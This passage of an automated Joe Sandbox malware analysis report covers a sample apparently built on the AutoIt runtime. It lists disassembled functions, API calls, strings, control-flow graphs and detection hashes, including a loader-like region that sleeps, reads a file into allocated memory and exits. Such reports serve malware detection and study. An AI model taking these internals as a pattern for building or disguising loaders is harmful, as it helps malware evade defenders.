                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                            • API String ID: 2914291525-1005189915
                                            • Opcode ID: e82e20747704f9b30521ba84e1e857ef10b5242c762d491671c19c1e630a67fb
                                            • Instruction ID: 7b0109dedabb7f5ae15af8d3957f5d05fb0cc6f4d278c2c0d07071ad1a682b39
                                            • Opcode Fuzzy Hash: e82e20747704f9b30521ba84e1e857ef10b5242c762d491671c19c1e630a67fb
                                            • Instruction Fuzzy Hash: 2D3136B5805309AFDB10CFA5EC85AD9BBF4FB09310F20416BE590F62A0E3B50599CF51
                                            Function 00E13041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00E13074
                                            • RegisterClassExW.USER32(00000030), ref: 00E1309E
                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E130AF
                                            • InitCommonControlsEx.COMCTL32(?), ref: 00E130CC
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E130DC
                                            • LoadIconW.USER32(000000A9), ref: 00E130F2
                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E13101
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                            • API String ID: 2914291525-1005189915
                                            • Opcode ID: f216d678ccb7cec78ea53e6b5cac24f7db9e3fab55d347b8b6737502269f757b
                                            • Instruction ID: d98fd3fc1691ef3c855caf4ae9f88010ea01dbda34b1352664c5253e1a51f7d9
                                            • Opcode Fuzzy Hash: f216d678ccb7cec78ea53e6b5cac24f7db9e3fab55d347b8b6737502269f757b
                                            • Instruction Fuzzy Hash: 8B21AEB5911218AFDB009FE6E889ADDBBF8FB08700F10412BEA10F62A0D7B145589F91
                                            Function 00E171EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00E14864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00ED62F8,?,00E137C0,?), ref: 00E14882
                                              • Part of subcall function 00E3074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E172C5), ref: 00E30771
                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E17308
                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E4ECF1
                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E4ED32
                                            • RegCloseKey.ADVAPI32(?), ref: 00E4ED70
                                            • _wcscat.LIBCMT ref: 00E4EDC9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                            • API String ID: 2673923337-2727554177
                                            • Opcode ID: d0c5c42261d6f3c2d0526f58a120b20bb8f138c52afc5c484bf2a8ec5eb9910b
                                            • Instruction ID: 41aae645c07acfc64a0ce156dd4c7377fb87ac4a5b00ba0875160f277cdaa08a
                                            • Opcode Fuzzy Hash: d0c5c42261d6f3c2d0526f58a120b20bb8f138c52afc5c484bf2a8ec5eb9910b
                                            • Instruction Fuzzy Hash: EA714AB15093419EC714DF26E88589BBBE8FF98740F40692FF485B32B0EB309989CB51
                                            Function 00E13633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 761 e13633-e13681 763 e136e1-e136e3 761->763 764 e13683-e13686 761->764 763->764 765 e136e5 763->765 766 e136e7 764->766 767 e13688-e1368f 764->767 768 e136ca-e136d2 DefWindowProcW 765->768 769 e4d31c-e4d34a call e211d0 call e211f3 766->769 770 e136ed-e136f0 766->770 771 e13695-e1369a 767->771 772 e1375d-e13765 PostQuitMessage 767->772 773 e136d8-e136de 768->773 808 e4d34f-e4d356 769->808 775 e136f2-e136f3 770->775 776 e13715-e1373c SetTimer RegisterWindowMessageW 770->776 777 e136a0-e136a2 771->777 778 e4d38f-e4d3a3 call e72a16 771->778 774 e13711-e13713 772->774 774->773 780 e136f9-e1370c KillTimer call e144cb call e13114 775->780 781 e4d2bf-e4d2c2 775->781 776->774 782 e1373e-e13749 CreatePopupMenu 776->782 783 e13767-e13776 call e14531 777->783 784 e136a8-e136ad 777->784 778->774 803 e4d3a9 778->803 780->774 788 e4d2c4-e4d2c6 781->788 789 e4d2f8-e4d317 MoveWindow 781->789 782->774 783->774 791 e4d374-e4d37b 784->791 792 e136b3-e136b8 784->792 797 e4d2e7-e4d2f3 SetFocus 788->797 798 e4d2c8-e4d2cb 788->798 789->774 791->768 800 e4d381-e4d38a call e6817e 791->800 801 e1374b-e1375b call e145df 792->801 802 e136be-e136c4 792->802 797->774 798->802 804 e4d2d1-e4d2e2 call e211d0 798->804 800->768 801->774 802->768 802->808 803->768 804->774 808->768 809 e4d35c-e4d36f call e144cb call e143db 808->809 809->768
                                            APIs
                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00E136D2
                                            • KillTimer.USER32(?,00000001), ref: 00E136FC
                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E1371F
                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E1372A
                                            • CreatePopupMenu.USER32 ref: 00E1373E
                                            • PostQuitMessage.USER32(00000000), ref: 00E1375F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                            • String ID: TaskbarCreated$%
                                            • API String ID: 129472671-3835587964
                                            • Opcode ID: 851dfe439b06472f91d60c0fdad13c204b42e38d9b1e4f5a9b3d1c0482ea06a1
                                            • Instruction ID: 951c880b18af09d796b948050eb196ad2e8ebc26ecab5b1cacfebf820ae54c46
                                            • Opcode Fuzzy Hash: 851dfe439b06472f91d60c0fdad13c204b42e38d9b1e4f5a9b3d1c0482ea06a1
                                            • Instruction Fuzzy Hash: FD41E4F1205145AFDB149F75FC09BFE37A5EB40300F14212BF502F62F2DA649E95A661
                                            Function 00E13A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00E13A62
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00E13A71
                                            • LoadIconW.USER32(00000063), ref: 00E13A88
                                            • LoadIconW.USER32(000000A4), ref: 00E13A9A
                                            • LoadIconW.USER32(000000A2), ref: 00E13AAC
                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E13AD2
                                            • RegisterClassExW.USER32(?), ref: 00E13B28
                                              • Part of subcall function 00E13041: GetSysColorBrush.USER32(0000000F), ref: 00E13074
                                              • Part of subcall function 00E13041: RegisterClassExW.USER32(00000030), ref: 00E1309E
                                              • Part of subcall function 00E13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E130AF
                                              • Part of subcall function 00E13041: InitCommonControlsEx.COMCTL32(?), ref: 00E130CC
                                              • Part of subcall function 00E13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E130DC
                                              • Part of subcall function 00E13041: LoadIconW.USER32(000000A9), ref: 00E130F2
                                              • Part of subcall function 00E13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E13101
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                            • String ID: #$0$AutoIt v3
                                            • API String ID: 423443420-4155596026
                                            • Opcode ID: a71c7602f8155ab786cc43902995ac2313639439a6f78a236d3abffab37ac587
                                            • Instruction ID: b6900a113178fe687953091c7a1a6836129e4b319a08cace6a5f6444d8bbb028
                                            • Opcode Fuzzy Hash: a71c7602f8155ab786cc43902995ac2313639439a6f78a236d3abffab37ac587
                                            • Instruction Fuzzy Hash: 7E212871A12308AFEB109FA6FC09B9D7BB5FB08711F10412BF504BA2B0D7B656588F94
                                            Function 00E13778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b
                                            • API String ID: 1825951767-3834736419
                                            • Opcode ID: f3c8aa2ccfde4a1b85c2137897f1fbe81ad2dfa660d06bcdc438ecac97c9ed98
                                            • Instruction ID: 5f6626af0e5f505bc3bc5cb7094e131f737f159eb7e1d916933a273fa3353666
                                            • Opcode Fuzzy Hash: f3c8aa2ccfde4a1b85c2137897f1fbe81ad2dfa660d06bcdc438ecac97c9ed98
                                            • Instruction Fuzzy Hash: E1A160729102199ACF04EFA0DC95EEEB7B9FF54300F44242AF416B7192DF749A89CB60
                                            Function 00E1F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E303D3
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E303DB
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E303E6
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E303F1
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E303F9
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E30401
                                              • Part of subcall function 00E26259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E1FA90), ref: 00E262B4
                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E1FB2D
                                            • OleInitialize.OLE32(00000000), ref: 00E1FBAA
                                            • CloseHandle.KERNEL32(00000000), ref: 00E549F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                            • String ID: <g$\d$%$c
                                            • API String ID: 1986988660-619945097
                                            • Opcode ID: fea12d5970af68eeaa7ba70fda50572be156b588b34818e6b632282a74bc89d2
                                            • Instruction ID: 3d661231104fc8750e6a842a867b0bdd1610e364c86669eff50495b93a6e7eed
                                            • Opcode Fuzzy Hash: fea12d5970af68eeaa7ba70fda50572be156b588b34818e6b632282a74bc89d2
                                            • Instruction Fuzzy Hash: FE81A8B09022508FC784EF6AFA526597BF4FB88708710A52BD028FB3A2EB35444DCF50
                                            Function 00D425C0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 994 d425c0-d4266e call d40000 997 d42675-d4269b call d434d0 CreateFileW 994->997 1000 d426a2-d426b2 997->1000 1001 d4269d 997->1001 1006 d426b4 1000->1006 1007 d426b9-d426d3 VirtualAlloc 1000->1007 1002 d427ed-d427f1 1001->1002 1004 d42833-d42836 1002->1004 1005 d427f3-d427f7 1002->1005 1008 d42839-d42840 1004->1008 1009 d42803-d42807 1005->1009 1010 d427f9-d427fc 1005->1010 1006->1002 1013 d426d5 1007->1013 1014 d426da-d426f1 ReadFile 1007->1014 1015 d42895-d428aa 1008->1015 1016 d42842-d4284d 1008->1016 1011 d42817-d4281b 1009->1011 1012 d42809-d42813 1009->1012 1010->1009 1019 d4281d-d42827 1011->1019 1020 d4282b 1011->1020 1012->1011 1013->1002 1021 d426f3 1014->1021 1022 d426f8-d42738 VirtualAlloc 1014->1022 1017 d428ac-d428b7 VirtualFree 1015->1017 1018 d428ba-d428c2 1015->1018 1023 d42851-d4285d 1016->1023 1024 d4284f 1016->1024 1017->1018 1019->1020 1020->1004 1021->1002 1025 d4273f-d4275a call d43720 1022->1025 1026 d4273a 1022->1026 1027 d42871-d4287d 1023->1027 1028 d4285f-d4286f 1023->1028 1024->1015 1034 d42765-d4276f 1025->1034 1026->1002 1031 d4287f-d42888 1027->1031 1032 d4288a-d42890 1027->1032 1030 d42893 1028->1030 1030->1008 1031->1030 1032->1030 1035 d42771-d427a0 call d43720 1034->1035 1036 d427a2-d427b6 call d43530 1034->1036 1035->1034 1042 d427b8 1036->1042 1043 d427ba-d427be 1036->1043 1042->1002 1044 d427c0-d427c4 FindCloseChangeNotification 1043->1044 1045 d427ca-d427ce 1043->1045 1044->1045 1046 d427d0-d427db VirtualFree 1045->1046 1047 d427de-d427e7 1045->1047 1046->1047 1047->997 1047->1002
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D42691
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D428B7
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateFileFreeVirtual
                                            • String ID:
                                            • API String ID: 204039940-0
                                            • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                            • Instruction ID: 6562daa1cfeab776a0d3078eae68855fee3ce546870129068dbd7b9098d65aea
                                            • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                            • Instruction Fuzzy Hash: 53A10374E00209EBDB14CFA4C894BEEBBB5FF48304F648559E501BB280D7759A81DBA4
                                            Function 00E139E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1115 e139e7-e13a57 CreateWindowExW * 2 ShowWindow * 2
                                            APIs
                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E13A15
                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E13A36
                                            • ShowWindow.USER32(00000000,?,?), ref: 00E13A4A
                                            • ShowWindow.USER32(00000000,?,?), ref: 00E13A53
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$CreateShow
                                            • String ID: AutoIt v3$edit
                                            • API String ID: 1584632944-3779509399
                                            • Opcode ID: c117b1d80d98ab99cdc0356cf55fa32582529fd82df093b6725258dcab976ea2
                                            • Instruction ID: f27e4d1dfa222d424f42a5adac022d58d8e8e332b9b42b8716991ce023e39c92
                                            • Opcode Fuzzy Hash: c117b1d80d98ab99cdc0356cf55fa32582529fd82df093b6725258dcab976ea2
                                            • Instruction Fuzzy Hash: F2F0D471642290BEEE311B67BC49E672F7DE7C6F50B00412BF904F61B0C6A61859DAB0
                                            Function 00D423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1116 d423b0-d424b8 call d40000 call d422a0 CreateFileW 1123 d424bf-d424cf 1116->1123 1124 d424ba 1116->1124 1127 d424d6-d424f0 VirtualAlloc 1123->1127 1128 d424d1 1123->1128 1125 d4256f-d42574 1124->1125 1129 d424f4-d4250b ReadFile 1127->1129 1130 d424f2 1127->1130 1128->1125 1131 d4250d 1129->1131 1132 d4250f-d42549 call d422e0 call d412a0 1129->1132 1130->1125 1131->1125 1137 d42565-d4256d ExitProcess 1132->1137 1138 d4254b-d42560 call d42330 1132->1138 1137->1125 1138->1137
                                            APIs
                                              • Part of subcall function 00D422A0: Sleep.KERNELBASE(000001F4), ref: 00D422B1
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D424AE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateFileSleep
                                            • String ID: UPZNG328X4M74N
                                            • API String ID: 2694422964-3359460464
                                            • Opcode ID: 34586e6d22d2e5e43d00ba4fbe4e020b4934f5a1fc211c8e2c21eaed95b4668b
                                            • Instruction ID: be05e2ff61047341eabd35ad079f2d6b3e60896caa7388bf5f2af98979949387
                                            • Opcode Fuzzy Hash: 34586e6d22d2e5e43d00ba4fbe4e020b4934f5a1fc211c8e2c21eaed95b4668b
                                            • Instruction Fuzzy Hash: 60517E30D14249EBEF11DBA4C815BEFBB78AF54300F504199E609BB2C0D7B95B45CBA5
                                            Function 00E1410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1140 e1410d-e14123 1141 e14200-e14204 1140->1141 1142 e14129-e1413e call e17b76 1140->1142 1145 e14144-e14164 call e17d2c 1142->1145 1146 e4d5dd-e4d5ec LoadStringW 1142->1146 1148 e4d5f7-e4d60f call e17c8e call e17143 1145->1148 1151 e1416a-e1416e 1145->1151 1146->1148 1158 e1417e-e141fb call e33020 call e1463e call e32ffc Shell_NotifyIconW call e15a64 1148->1158 1162 e4d615-e4d633 call e17e0b call e17143 call e17e0b 1148->1162 1152 e14205-e1420e call e181a7 1151->1152 1153 e14174-e14179 call e17c8e 1151->1153 1152->1158 1153->1158 1158->1141 1162->1158
                                            APIs
                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E4D5EC
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            • _memset.LIBCMT ref: 00E1418D
                                            • _wcscpy.LIBCMT ref: 00E141E1
                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E141F1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                            • String ID: Line:
                                            • API String ID: 3942752672-1585850449
                                            • Opcode ID: 3c3ff8db7ae325199e8c25faa80a32f4970ad0141228b828b0b9478f1f834978
                                            • Instruction ID: 205c0044a0c8f073ab6a83e1de312c34248070794131ae01ae41533b5c4919f0
                                            • Opcode Fuzzy Hash: 3c3ff8db7ae325199e8c25faa80a32f4970ad0141228b828b0b9478f1f834978
                                            • Instruction Fuzzy Hash: 1D319CB1109304AED721EB60EC46FDA77E8AF44714F10651FF195B21A1EB74A6C8CB92
                                            Function 00E3564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                            • String ID:
                                            • API String ID: 1559183368-0
                                            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                            • Instruction ID: 69704df051544cb89ffc942bda0938a2141daf3118917a2aca26a5c58f8a2d02
                                            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                            • Instruction Fuzzy Hash: E6518132A00B05DBDB248F69C8896AEBFF5AF40324F64962AF825B63D0D7709D50CB40
                                            Function 00E169CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E14F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00ED62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E14F6F
                                            • _free.LIBCMT ref: 00E4E68C
                                            • _free.LIBCMT ref: 00E4E6D3
                                              • Part of subcall function 00E16BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E16D0D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _free$CurrentDirectoryLibraryLoad
